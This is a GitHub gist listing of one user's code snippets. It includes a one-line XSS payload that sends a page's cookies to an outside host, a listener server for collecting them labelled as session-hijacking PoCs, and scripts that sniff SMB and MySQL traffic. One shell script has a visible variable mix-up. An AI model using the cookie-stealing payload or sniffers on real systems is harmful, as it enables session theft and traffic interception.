Skip to content

Instantly share code, notes, and snippets.

View cgimenes's full-sized avatar

Marcelo Gimenes de Oliveira cgimenes

23 followers · 17 following
  • Brazil
View GitHub Profile
@cgimenes
cgimenes / session-hijacker.js
Created March 6, 2019 12:41
Simple script for session hijacking PoCs
<script>document.createElement("img").src = "http://toninho:8080/?cookie="+document.cookie;</script>
@cgimenes
cgimenes / session-hijacker.py
Last active August 3, 2020 20:36
Simple HTTP server for session hijacking PoCs
#!/usr/bin/env python
from http.server import HTTPServer, BaseHTTPRequestHandler
from optparse import OptionParser
class RequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
print(self.headers)
self.send_response(204)
@cgimenes
cgimenes / grabsmbversion.sh
Created February 15, 2019 19:38
Grab SMB version
#!/bin/sh
if [ -z $1 ]; then echo "Usage: ./grabsmbversion.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
if [ ! -z $3 ]; then intf=$3; else rport='eth0'; fi
ngrep -i -d $intf 's.?a.?m.?b.?a.*[[:digit:]]' port $rport &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
@cgimenes
cgimenes / smbver.sh
Last active February 15, 2019 19:38
Will listen for the first 7 packets of a null login and grab the SMB Version. by rewardone
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
@cgimenes
cgimenes / webscraper.py
Created February 14, 2019 17:50
Simple python web scraper
import requests
from bs4 import BeautifulSoup
page = 0
urls = []
while True:
print(f"Page: {page}")
site = requests.get(f"https://pudim.com.br/?page={page}");
if site.status_code is 200:
content = BeautifulSoup(site.content, 'html.parser')
@cgimenes
cgimenes / webscraper.rb
Last active February 14, 2019 02:01
Simple ruby web scraper
require 'httparty'
require 'nokogiri'
require 'cgi'
all_objects = []
('a'..'z').each do |letter|
page = 1
total_pages = 1
@cgimenes
cgimenes / nginx.conf
Created October 31, 2017 03:28
simple redirect by uri
location /api {
rewrite ^/api(.*) $1 break;
proxy_pass http://localhost:8084;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host $http_host;
}
@cgimenes
cgimenes / java.service
Created October 31, 2017 03:27
Deploy Java (/usr/lib/systemd/system/)
[Unit]
Description=Java Service
[Service]
User=nobody
# The configuration file application.properties should be here:
WorkingDirectory=/webapps
ExecStart=/usr/bin/java -Xmx256m -jar dmgco.jar
SuccessExitStatus=143
TimeoutStopSec=10
@cgimenes
cgimenes / mysqlSniffer.sh
Last active July 21, 2017 13:19
tcpdump MySQL traffic
#!/bin/bash
intf=$1
port=$2
if [ -z "${intf}" ]; then
intf="eth0"
fi
if [ -z "${port}" ]; then
port="3306"
fi
@cgimenes
cgimenes / debugcss.js
Created July 14, 2017 00:22
Debug CSS
[].forEach.call($$("*"),function(a){
a.style.outline="1px solid #"+(~~(Math.random()*(1<<24))).toString(16)
})